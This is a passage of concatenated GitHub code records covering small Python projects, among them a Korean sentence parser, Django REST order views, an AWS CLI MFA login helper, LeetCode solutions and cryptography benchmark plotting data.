\"-\" + self.point_term[self.player2_score]\n \n def score_difference(self, score1, score2):\n difference_for_player1 = score1-score2\n if difference_for_player1 == 1:\n return \"Advantage player1\"\n elif difference_for_player1 == -1:\n return \"Advantage player2\"\n elif difference_for_player1 >= 2:\n return \"Win for player1\"\n else:\n return \"Win for player2\"","repo_name":"oskari83/ohjelmistotuotanto","sub_path":"viikko5/tennis/src/tennis_game.py","file_name":"tennis_game.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30922697813","text":"import unittest\nimport pandas\nimport pandas.testing as test\nfrom shapercore.Visitor.MetaClass.Dataframe import Dataframe\nfrom shapercore.Modules.natural_language.nltk.lowercase import Tokenizer\n\n\nclass LowercaseTest(unittest.TestCase):\n\n def test_unit(self):\n column = \"test_column\"\n test_data = pandas.DataFrame({column: [\"Test String\", \"anothertest string\", \"Another test string\", \"test\"]})\n verify_data = pandas.DataFrame({column: [[\"Test\", \"String\"], [\"anothertest\", \"string\"],\n [\"Another\", \"test\", \"string\"], [\"test\"]]})\n test_featureset = Dataframe()\n verify_featureset = Dataframe()\n test_featureset.set_dataframe(test_data)\n verify_featureset.set_dataframe(verify_data)\n visitor = Tokenizer(column)\n visitor.visit(test_featureset)\n test.assert_frame_equal(test_featureset.get_dataframe(), verify_featureset.get_dataframe())\n","repo_name":"MarcelHimmelreich/shaperML","sub_path":"shapercore/ModulesUnitTest/natural_language/tokenizer_test.py","file_name":"tokenizer_test.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35731438804","text":"import re, json\nfrom pprint import pprint, pformat\nfrom datetime import datetime\n\nfrom tagmap import TagMap\nfrom chunker import Chunker\nfrom definition import getWordDefs\n\nfrom konlpy.tag import Kkma\n\ndef buildParseTree(chunkTree, showAllLevels=False):\n \"constructs display structures from NLTK chunk-tree\"\n # first, recursively turn the chunk tree into a Python nested dict so it can be JSONified\n # gathering terminals list & adding level from root & parent links along the way\n terminals = []; height = [0]; allNodes = []; nodeIDs = {}\n def asDict(chunk, parent=None, level=0, isLastChild=False):\n height[0] = max(height[0], level)\n if not showAllLevels:\n # elide degenerate tree nodes (those with singleton children)\n while isinstance(chunk, nltk.Tree) and len(chunk) == 1:\n chunk = chunk[0]\n if isinstance(chunk, nltk.Tree):\n tag = chunk.label()\n # ad-hoc label mappings\n if tag == 'S':\n tag = 'Sentence'\n elif tag == 'Predicate' and not isLastChild:\n tag = 'Verb Phrase'\n # build tree node\n node = dict(type='tree', tag=tag, level=level, layer=1, parent=parent)\n node['children'] = [asDict(c, node, level+1, isLastChild=i == len(chunk)-1) for i, c in enumerate(chunk)]\n nodeID = nodeIDs.get(id(node))\n if not nodeID:\n nodeIDs[id(node)] = nodeID = len(nodeIDs) + 1\n node['id'] = nodeID\n allNodes.append(node)\n return node\n else:\n word = chunk[0].strip()\n tag = chunk[1]\n tm = TagMap.POS_labels.get(word + \":\" + tag)\n tagLabel = (tm.posLabel if tm else TagMap.partsOfSpeech.get(tag)[0]).split('\\n')\n node = dict(type='word', word=word, tag=tag, tagLabel=tagLabel, children=[], parent=parent, level=-1, layer=0)\n nodeID = nodeIDs.get(id(node))\n if not nodeID:\n nodeIDs[id(node)] = nodeID = len(nodeIDs) + 1\n node['id'] = nodeID\n terminals.append(node)\n allNodes.append(node)\n return node\n tree = asDict(chunkTree)\n\n\ndef parse():\n \"parse POSTed Korean sentence\"\n # grab sentence to parse\n input = request.form.get('sentence')\n if not input:\n return jsonify(result=\"FAIL\", msg=\"Missing input sentence(s)\")\n showAllLevels = request.form.get('showAllLevels') == 'true'\n\n # parse input & return parse results to client\n sentences = parseInput(input, parser=\"RD\", showAllLevels=showAllLevels)\n\n return jsonify(result=\"OK\",\n sentences=sentences)\n\ndef parseInput(input, parser=\"RD\", showAllLevels=False, getWordDefinitions=True):\n \"parse input string into list of parsed contained sentence structures\"\n # parser can be RD for recusrsive descent (currently the most-developed) or \"NLTK\" for the original NLTK chunking-grammar parser\n\n # clean & build a string for the KHaiii phoneme analyzer\n input = input.strip()\n if input[-1] not in ['.', '?', '!']:\n input += '.'\n input = re.sub(r'\\s+([\\.\\?\\;\\,\\:])', r'\\1', input) # elide spaces preceding clause endings, throws Khaiii off\n # input = input.replace(',', ' , ').replace(';', ' ; ').replace(':', ' : ') - adding a space before punctuation seems to mess tagging in Khaiii\n print(\"* parse {0}\".format(input))\n\n # run Khaiii, grab the parts-of-speech list it generates (morphemes + POS tags) and extract original word-to-morpheme groupings\n sentences = [] # handle possible multiple sentences\n posList = []; morphemeGroups = []\n kkma_parser = Kkma()\n\n for w in input.split(\" \"):\n morphs = kkma_parser.pos(w)\n morphemeGroups.append([w, [m[0] for m in morphs if m[1] != 'SF']])\n for m in morphs:\n tag = m[1]\n if tag == \"ETD\" :\n tag = \"ETM\"\n if tag == \"EFN\" :\n tag = \"EF\"\n posList.append('{0}:{1}'.format(m[0].strip(), tag))\n if m[1] == 'SF':\n # sentence end, store extractions & reset for possible next sentence\n sentences.append(dict(posList=posList, morphemeGroups=morphemeGroups, posString=';'.join(posList)))\n posList = []; morphemeGroups = []\n\n for s in sentences:\n # map POS through synthetic tag mapper & extract word groupings\n mappedPosList, morphemeGroups = TagMap.mapTags(s['posString'], s['morphemeGroups']) #, disableMapping=True)\n print(\" {0}\".format(s['posString']))\n print(\" mapped to {0}\".format(mappedPosList))\n\n if parser == \"NLTK\": # NLTK chunking parser\n # perform chunk parsing\n chunkTree = Chunker.parse(mappedPosList, trace=2)\n chunkTree.pprint()\n # apply any synthetic-tag-related node renamings\n TagMap.mapNodeNames(chunkTree)\n # extract popup wiki definitions & references links & notes for implicated nodes\n references = TagMap.getReferences(chunkTree)\n # build descriptive phrase list\n phrases = Chunker.phraseList(chunkTree)\n #\n parseTreeDict = buildParseTree(chunkTree, showAllLevels=showAllLevels)\n\n else: # recursive-descent parser\n from rd_grammar import KoreanParser\n parser = KoreanParser([\":\".join(p) for p in mappedPosList])\n parseTree = parser.parse(verbose=0)\n print(\"parse tree : \", parseTree)\n if parseTree:\n # apply any synthetic-tag-related node renamings\n parseTree.mapNodeNames()\n # extract popup wiki definitions & references links & notes for implicated nodes\n references = parseTree.getReferences()\n # build descriptive phrase list\n phrases = parseTree.phraseList()\n # get noun & verb translations from Naver\n wordDefs = getWordDefs(mappedPosList) if getWordDefinitions else {}\n print(mappedPosList)\n print(\"word definitions :\\n\", wordDefs)\n # build JSONable parse-tree dict\n parseTreeDict = parseTree.buildParseTree(wordDefs=wordDefs, showAllLevels=showAllLevels)\n print(\" {0}\".format(parseTree))\n else:\n # parsing failed, return unrecognized token\n parseTree = references = parseTreeDict = phrases = None\n s.update(dict(error=\"Sorry, failed to parse sentence\",\n lastToken=parser.lastTriedToken()))\n print(\" ** failed. Unexpected token {0}\".format(parser.lastTriedToken()))\n\n # format debugging daat\n debugging = dict(posList=pformat(s['posList']),\n mappedPosList=pformat(mappedPosList),\n phrases=pformat(phrases),\n morphemeGroups=pformat(morphemeGroups),\n parseTree=pformat(parseTreeDict),\n references=references)\n\n # add parsing results to response structure\n s.update(dict(mappedPosList=mappedPosList,\n morphemeGroups=morphemeGroups,\n parseTree=parseTreeDict,\n references=references,\n phrases=phrases,\n debugging=debugging\n ))\n #\n return sentences","repo_name":"taherromdhane/SD213-project-simple-korean-parser","sub_path":"Parse.py","file_name":"Parse.py","file_ext":"py","file_size_in_byte":7489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13172501547","text":"import re\n\nfrom my_utils import is_line_valid\n\n\ndef print_sent_gigabytes():\n sent_bytes = sum_sent_bytes()\n sent_gigabytes = bytes_to_gigabytes(sent_bytes)\n print(f\"{sent_gigabytes}GB\")\n\n\ndef sum_sent_bytes():\n total_bytes = 0\n\n while True:\n try:\n line = input()\n\n if not is_line_valid(line):\n raise ValueError(\"Invalid line\")\n elif re.search(r\" \\d+$\", line):\n total_bytes += int(line.split()[-1])\n\n except EOFError:\n break\n\n return total_bytes\n\n\ndef bytes_to_gigabytes(b):\n return round(b * (10 ** -9), 2)\n\n\nif __name__ == '__main__':\n print_sent_gigabytes()\n","repo_name":"Ptaku09/ScriptLanguages","sub_path":"Lab2/lab_3_b.py","file_name":"lab_3_b.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40694744355","text":"#!/usr/bin/env python3\nimport math\n\n# 本机运行正确,在leetcode上运行不正确。可能是python版本问题\n#\n\n\nclass ListNode(object):\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass Solution(object):\n def bucket_sort(self, array):\n \"\"\"\n :param array: list[float] or list[(float, ...)] unsorted-array\n :return: list[float] or list[(float, ...)] sorted-array\n \"\"\"\n n = len(array)\n linkArray = [ListNode(-1) for i in range(n)]\n result = []\n\n if isinstance(array[0], int): #根据是否附带卫星数据分情况\n for i in range(n):\n index = math.floor(n * array[i])\n newNode = ListNode(array[i])\n cur = linkArray[index]\n while cur.next:\n if cur.next.val >= array[i]:\n newNode.next = cur.next\n cur.next = newNode\n break\n cur = cur.next\n else:\n cur.next = newNode\n\n for i in range(len(linkArray)):\n if linkArray[i].next:\n cur = linkArray[i].next\n while cur:\n result.append(cur.val)\n cur = cur.next\n else:\n for i in range(n):\n index = int(math.floor(n * array[i][0]))\n newNode = ListNode(array[i])\n cur = linkArray[index]\n while cur.next:\n if cur.next.val[0] >= array[i][0]:\n newNode.next = cur.next\n cur.next = newNode\n break\n cur = cur.next\n else:\n cur.next = newNode\n\n for i in range(len(linkArray)):\n if linkArray[i].next:\n cur = linkArray[i].next\n while cur:\n result.append(cur.val)\n cur = cur.next\n\n return result\n\n def bucket_sort_pretreatment(self, array):\n new_array = []\n\n if isinstance(array[0], int):\n maxNum = max(array)\n minNum = min(array)\n length = maxNum - minNum + 1\n new_array = [((x-minNum)/length, x) for x in array]\n else:\n maxNum = max([x[0] for x in array])\n minNum = min([x[0] for x in array])\n length = maxNum - minNum + 1\n new_array = [((x[0]-minNum)/length, x) for x in array]\n\n return new_array\n\n def maximumGap(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums or len(nums) < 2:\n return 0\n\n result = [x[1] for x in self.bucket_sort(self.bucket_sort_pretreatment(nums))]\n gap = 0\n for i in range(1, len(result)):\n if result[i] - result[i-1] > gap:\n gap = result[i] - result[i-1]\n\n return gap\n\ns = Solution()\nprint(s.maximumGap([1,10000000]))\n","repo_name":"vNKB7/leetcode","sub_path":"python/164_Maximum_Gap.py","file_name":"164_Maximum_Gap.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13426074475","text":"ex_input = 'GATGGAACTTGACTACGTAAATT'\n\ninput_file = 'Data/rosalind_rna.txt'\nwith open(input_file) as f:\n data = f.readline()\ndata = data.strip()\n\ndef DNAtoRNA(data):\n data = list(data)\n for i in range(0, len(data)):\n if data[i] == 'T':\n data[i] = 'U'\n rna_data = ''\n return rna_data.join(data)\n\nprint(DNAtoRNA(ex_input))\n\nprint(DNAtoRNA(data))\n","repo_name":"GeniaHarrietBoeing/Rosalind","sub_path":"DNAtoRNA.py","file_name":"DNAtoRNA.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37397132532","text":"from Problem27 import primes\r\n\r\nNUMBERS = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\r\n\r\ndef ispandigital(i):\r\n \"\"\"\r\n Checks if string i is a pandigital number\r\n \"\"\"\r\n # If too long it returns false\r\n if len(i) > 10:\r\n return False\r\n\r\n # Loops through all numbers below the lenth of the string\r\n for j in range(len(i)):\r\n if NUMBERS[j] in i:\r\n continue\r\n else:\r\n # Returns false if one of the numbers is missing\r\n return False\r\n \r\n # Returns True if all tests pass\r\n return True\r\n\r\n# Loops though primes below 10 million until pandigital is found\r\nreversedprimes = reversed([_ for _ in primes(10000000)])\r\nfor i in reversedprimes:\r\n if ispandigital(str(i)):\r\n # Prints out answer\r\n print(i)\r\n break","repo_name":"chrisvail/Project_Euler","sub_path":"Problem41.py","file_name":"Problem41.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2788862059","text":"# -*- coding:utf-8 -*-\n\n\"\"\" 输入一棵二叉搜索树,将该二叉搜索树转换成一个排序的双向链表。要求不能创建任何新的结点,只能调整树中结点指针的指向。 \"\"\"\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n node_list = []\n\n def Convert(self, pRootOfTree):\n self.node_list = []\n if pRootOfTree:\n self.scan_tree(pRootOfTree)\n self.change_pointers()\n return self.node_list[0] if self.node_list else None\n\n def scan_tree(self, root):\n \"\"\" 扫描当前树,将其按中序遍历顺序添加到node list列表中 \"\"\"\n if root.left:\n self.scan_tree(root.left)\n self.node_list.append(root)\n if root.right:\n self.scan_tree(root.right)\n\n def change_pointers(self):\n \"\"\" 调整指针指向 \"\"\"\n nodes = [None]\n nodes.extend(self.node_list)\n nodes.append(None)\n for last, this, next in zip(nodes[:-2], nodes[1:-1], nodes[2:]):\n this.left = last\n this.right = next\n","repo_name":"GoogleGu/leetcode","sub_path":"offer/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"69895641204","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(-4, 4, 6)\nprint('x = ' , x)\ny = np.linspace(-4, 4, 6)\nprint('y = ', y)\nX, Y = np.meshgrid(x, y)\nprint('X = ', X)\nprint('Y = ', Y)\nU = X + Y\nprint('U = ', U)\nV = Y - X\nprint('V = ', V)\n\nfig, ax = plt.subplots()\nax.quiver(X, Y, U, V, color=\"C0\", angles='xy', scale_units='xy', scale=5, width=.015)\nax.set(xlim=(-5, 5), ylim=(-5, 5))\nplt.show()","repo_name":"camihurs/PensamientoComputacional","sub_path":"PruebaQuiver.py","file_name":"PruebaQuiver.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8181523966","text":"from typing import Any, Type\n\nfrom aiohttp.client import ClientSession\n\nfrom pydantic_client.clients.abstract_client import AbstractClient\nfrom pydantic_client.proxy import AsyncClientProxy, Proxy\nfrom pydantic_client.schema.http_request import HttpRequest\n\n\nclass AIOHttpClient(AbstractClient):\n runner_class: Type[Proxy] = AsyncClientProxy\n\n def __init__(self, base_url: str):\n self.base_url = base_url.rstrip(\"/\")\n\n async def do_request(self, request: HttpRequest) -> Any:\n data, json = self.parse_request(request)\n async with ClientSession() as session:\n try:\n req = session.request(\n url=self.base_url + request.url,\n method=request.method,\n json=json,\n data=data\n )\n\n async with req as resp:\n resp.raise_for_status()\n if resp.status == 200:\n return resp.json()\n except BaseException as e:\n raise e\n","repo_name":"ponytailer/pydantic-client","sub_path":"pydantic_client/clients/aiohttp.py","file_name":"aiohttp.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"39754312129","text":"#!/usr/bin/env python3\n\n# Follows the directions from AWS on using MFA with CLI:\n# https://aws.amazon.com/premiumsupport/knowledge-center/authenticate-mfa-cli/\n\n# That means: call STS with an ARN and an MFA token,\n# with the response, populate an MFA section in aws creds file\n\n\nimport os\nimport json\nimport configparser\nimport argparse\n\nfrom pathlib import Path\n\n\ndef parse_cli_args():\n argparser = argparse.ArgumentParser(prog='aws-cli-mfa', description='Login to AWS CLI using MFA token with STS')\n\n argparser.add_argument('profile_arn', metavar='profile-arn',\n help='the AWS ARN for your MFA profile')\n argparser.add_argument('mfa_token', metavar='mfa-token',\n help='the MFA token from your authenticator app for the MFA profile your ARN is for')\n argparser.add_argument('-p', '--aws-profile',\n help='AWS profile to use when contacting STS to get MFA credentials')\n argparser.add_argument('-s', '--aws-creds-mfa-section', default='mfa',\n help='section to save MFA credentials to in AWS credentials file (default: mfa)')\n argparser.add_argument('-f', '--aws-creds-file', default=str(Path.home())+'/.aws/credentials',\n help='file path to AWS credentials file (default: ~/.aws/credentials)')\n argparser.add_argument('-e', '--aws-env-vars', action='store_true',\n help='export/set AWS access/secret/session env vars instead of updating creds file')\n argparser.add_argument('-x', '--no-export-profile', action='store_true',\n help='do not export/set AWS_PROFILE to the one generated by STS')\n argparser.add_argument('-d', '--lifetime-duration', type=int,\n help='set the time, in seconds, that the access should last (default 12 hours)')\n\n return argparser.parse_args()\n\n\ndef gen_sts_cmd(cli_args):\n sts_args = []\n\n if cli_args.aws_profile:\n sts_args.append(f'--profile {cli_args.aws_profile}')\n\n sts_args.append(f'--serial-number {cli_args.profile_arn}')\n sts_args.append(f'--token-code {cli_args.mfa_token}')\n\n if cli_args.lifetime_duration:\n sts_args.append(f'--duration-seconds {cli_args.lifetime_duration}')\n\n return f\"aws sts get-session-token {' '.join(sts_args)}\"\n\n\ndef write_config(creds_file, mfa_profile_section, creds):\n config = configparser.ConfigParser()\n config.read(creds_file)\n\n config[mfa_profile_section] = creds\n\n with open(creds_file, 'w') as configfile:\n config.write(configfile)\n\n\ndef apply_sts_json(\n sts_json,\n use_env_vars,\n creds_file,\n mfa_profile_section,\n export_profile\n ):\n\n envvars = {}\n creds = {\n 'AWS_ACCESS_KEY_ID': sts_json[\"Credentials\"][\"AccessKeyId\"],\n 'AWS_SECRET_ACCESS_KEY': sts_json[\"Credentials\"][\"SecretAccessKey\"],\n 'AWS_SESSION_TOKEN': sts_json[\"Credentials\"][\"SessionToken\"],\n }\n\n if use_env_vars:\n envvars = creds.copy()\n else:\n write_config(creds_file, mfa_profile_section, creds)\n\n if export_profile:\n envvars['AWS_PROFILE'] = mfa_profile_section\n\n return envvars\n\n\ndef build_response():\n response = {}\n\n cli_args = parse_cli_args()\n sts_cmd = gen_sts_cmd(cli_args)\n response['sts_cmd'] = sts_cmd\n\n sts_output = os.popen(sts_cmd).read()\n try:\n sts_json = json.loads(sts_output)\n\n try:\n response['envvars'] = apply_sts_json(\n sts_json,\n cli_args.aws_env_vars,\n cli_args.aws_creds_file,\n cli_args.aws_creds_mfa_section,\n not cli_args.no_export_profile\n )\n except Exception as ex:\n response['output'] = str(ex)\n except:\n response['output'] = sts_output\n\n return response\n\nif __name__ == '__main__':\n print(json.dumps(build_response()))\n","repo_name":"rogusdev/aws-cli-mfa","sub_path":"src/aws_cli_mfa.py","file_name":"aws_cli_mfa.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"6567779516","text":"from queue import Queue\n\n\nclass Node:\n def __init__(self, y, x, dist, sol):\n self.y = y\n self.x = x\n self.dist = dist\n self.sol = sol\n\n\ndef path2exit(maze, x, y):\n height = len(maze)\n width = len(maze[0])\n # print(height, width)\n\n visited = [[False for _ in range(width)] for _ in range(height)]\n q = Queue()\n solutions = []\n q.put(Node(y, x, 0, \"\"))\n while not q.empty():\n node = q.get()\n j = node.y\n i = node.x\n dist = node.dist\n sol = node.sol\n visited[j][i] = True\n\n # print(j, i, maze[y][x], sol)\n if maze[j][i] == '#':\n continue\n\n if maze[j][i] == 'X':\n solutions.append(sol)\n continue\n\n if i - 1 > 0:\n if not visited[j][i-1]:\n q.put(Node(j, i-1, dist + 1, sol + \"L\"))\n if i + 1 < width:\n if not visited[j][i+1]:\n q.put(Node(j, i+1, dist + 1, sol + \"R\"))\n if j - 1 > 0:\n if not visited[j-1][i]:\n q.put(Node(j-1, i, dist + 1, sol + \"U\"))\n if j + 1 < height:\n if not visited[j+1][i]:\n q.put(Node(j+1, i, dist + 1, sol + \"D\"))\n\n # print(solutions)\n if not solutions:\n return -1\n\n shortest = len(solutions[0])\n for i, s in enumerate(solutions):\n if len(s) < shortest:\n shortest = i\n\n return solutions[i]\n\nmaze = [\n '..#.',\n '..#.',\n '...X',]\n\n# maze = ['..X']\n\nprint(path2exit(maze, 0, 0))\n","repo_name":"Gawainus/hse","sub_path":"algo_ds_2/week1/bfs_4.py","file_name":"bfs_4.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28461514663","text":"from ast import Try\nfrom django.http import JsonResponse\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom .models import Customer, Customer_Order, Product, Order_Item\nfrom .serializer import (\n Customer_Serializer,\n Customer_Order_Serializer,\n Product_Serializer,\n Order_Item_Serializer,\n)\n\n# ---------------------------- Customer ---------------------------------------------------\n\n\n@api_view([\"GET\"])\ndef customers_list_all(request):\n customers = Customer.objects.all()\n serializer = Customer_Serializer(customers, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef customer_create_one(request):\n my_customer = Customer(\n name_cust=request.data[\"name_cust\"],\n email_cust=request.data[\"email_cust\"],\n phone_cust=request.data[\"phone_cust\"],\n address_cust=request.data[\"address_cust\"],\n )\n my_customer.save()\n return JsonResponse(\n f\"The Customer {my_customer.name_cust} was created successfully with id = {my_customer.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef customer(request, pk):\n try:\n my_customer = Customer.objects.get(pk=pk)\n except Customer.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer with id '{pk}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n if request.method == \"GET\":\n serializer = Customer_Serializer(my_customer)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Customer_Serializer(my_customer, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_customer.delete()\n return Response(f\"The Customer '{my_customer.name_cust}', with id = {pk}, was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n\n\n# --------------------------- Customer_Order ---------------------------------------------------\n\n\n@api_view([\"GET\"])\ndef customer_customer_orders_list_all(request, customer_id):\n customer_orders = Customer_Order.objects.filter(\n customer_cust_ord=customer_id)\n serializer = Customer_Order_Serializer(customer_orders, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef customer_order_create_one(request, customer_id):\n try:\n my_customer = Customer.objects.get(pk=customer_id)\n except Customer.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer with id '{customer_id}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n my_new_customer_order = Customer_Order(\n description_cust_ord=request.data[\"description_cust_ord\"],\n status_cust_ord=request.data[\"status_cust_ord\"],\n customer_cust_ord=my_customer,\n )\n my_new_customer_order.save()\n return JsonResponse(\n f\"The Customer Order '{my_new_customer_order.description_cust_ord}' was created successfully for the customer '{my_customer.name_cust}' and id = {my_new_customer_order.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef customer_order(request, pk):\n try:\n my_customer_order = Customer_Order.objects.get(pk=pk)\n except Customer_Order.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer Order with id = '{pk}' doesn't exist\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n if request.method == \"GET\":\n serializer = Customer_Order_Serializer(my_customer_order)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Customer_Order_Serializer(\n my_customer_order, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_customer_order.delete()\n return Response(f\"The Customer Order '{my_customer_order.description_cust_ord}' with id = '{pk}' was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n\n\n# --------------------------- Product ---------------------------------------------------\n\n@api_view([\"GET\"])\ndef products_list_all(request):\n products = Product.objects.all()\n serializer = Product_Serializer(products, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef product_create_one(request):\n my_product = Product(\n name_prod=request.data[\"name_prod\"],\n description_prod=request.data[\"description_prod\"],\n price_prod=request.data[\"price_prod\"],\n quantity_prod=request.data[\"quantity_prod\"],\n )\n my_product.save()\n return JsonResponse(\n f\"The Product '{my_product.name_prod}' was created successfully with id = {my_product.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef product(request, pk):\n try:\n my_product = Product.objects.get(pk=pk)\n except Product.DoesNotExist:\n return Response(\n {\"error\": f\"The Product with id '{pk}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n if request.method == \"GET\":\n serializer = Product_Serializer(my_product)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Product_Serializer(my_product, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_product.delete()\n return Response(f\"The Product '{my_product.name_prod}', with id = {pk}, was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n\n# --------------------------- Order_Item ------------------------------------------\n\n\n@api_view([\"GET\"])\ndef order_order_items_list_all(request, customer_order_id):\n order_order_items = Order_Item.objects.filter(\n order_ord_item=customer_order_id)\n serializer = Order_Item_Serializer(order_order_items, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef order_item_create_one(request, customer_order_id, product_id):\n try:\n my_customer_order = Customer_Order.objects.get(pk=customer_order_id)\n except Customer_Order.DoesNotExist:\n return Response(\n {\"error\": f\"The Customer Order with id '{customer_order_id}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n try:\n my_product = Product.objects.get(pk=product_id)\n except Product.DoesNotExist:\n return Response(\n {\"error\": f\"The Product with id '{product_id}' doesn't exist\"}, status=status.HTTP_404_NOT_FOUND\n )\n my_new_order_item = Order_Item(\n order_ord_item=my_customer_order,\n product_ord_item=my_product,\n price_ord_item=request.data[\"price_ord_item\"],\n quantity_ord_item=request.data[\"quantity_ord_item\"],\n )\n my_new_order_item.save()\n return JsonResponse(\n f\"The Order Item for the product '{my_product.name_prod}' was created successfully for the customer order '{my_customer_order.description_cust_ord}' and id = {my_new_order_item.id}\",\n status=status.HTTP_201_CREATED,\n safe=False,\n )\n\n\n@api_view([\"GET\", \"PUT\", \"DELETE\"])\ndef order_item(request, pk):\n try:\n my_order_item = Order_Item.objects.get(pk=pk)\n except Order_Item.DoesNotExist:\n return Response(\n {\"error\": f\"The order item with id = '{pk}' doesn't exist\"},\n status=status.HTTP_404_NOT_FOUND,\n )\n\n if request.method == \"GET\":\n serializer = Order_Item_Serializer(my_order_item)\n return Response(serializer.data)\n\n if request.method == \"PUT\":\n serializer = Order_Item_Serializer(\n my_order_item, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n if request.method == \"DELETE\":\n my_order_item.delete()\n return Response(f\"The Order Item with id = '{pk}' was deleted successfully\", status=status.HTTP_204_NO_CONTENT)\n","repo_name":"rafaelsoteldosilva/django_ordenes_productos","sub_path":"ordenes_productos/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3916924325","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# data collected from TODO : puth excel file path\n\n# AES Results\ncbc_enc_cpb_mean = (2.3685862151, 2.7941152963, 3.1697130095)\ncbc_enc_cpb_stdev = (0.2448099182, 0.3092048224, 0.2204836467)\nctr_cpb_mean = (0.5838479387, 0.6931198856, 0.7955039347)\nctr_cpb_stdev = (0.0484978139, 0.0789836157, 0.1180309327)\ngcm_enc_cpb_mean = (0.6099892252, 0.7089767014, 0.8009293081)\ngcm_enc_cpb_stdev = (0.0702988225, 0.0879610644, 0.0928299511)\ncbc_dec_cpb_mean = (0.6056169963, 0.7036722533, 0.7818869342)\ncbc_dec_cpb_stdev = (0.0614463588, 0.1058349596, 0.0276899868)\ngcm_dec_cpb_mean = (0.6296174819, 0.7112930339, 0.8128298198)\ngcm_dec_cpb_stdev = (0.1029567728, 0.0579556255, 0.1023129858)\n\n# SHA Results\nsha_cpb_mean = (6.4715533278, 4.3574680072, 4.3262215193)\nsha_cpb_stdev = (0.3495392566, 0.2725921272, 0.1503878577)\n\n# RSA Results\nrsa_sign_cpb_mean = (5.6730520495, 116.3897036042, 614.0089232005)\necc_sign_cpb_mean = (0.8888893411, 2.0287472943, 4.3417407161)\nrsa_sign_cpb_stdev = (0.6725152461, 3.6515501268, 12.714253515)\necc_sign_cpb_stdev = (0.1100842359, 0.2774615172, 0.6001073186)\n\nrsa_ver_cpb_mean = (0.1144054453, 0.6320163672, 2.562243)\necc_ver_cpb_mean = (0.992241763, 2.2594288125, 4.5881856771)\nrsa_ver_cpb_stdev = (0.0142365226, 0.0295835435, 0.2066347502)\necc_ver_cpb_stdev = (0.1755392219, 0.2562180472, 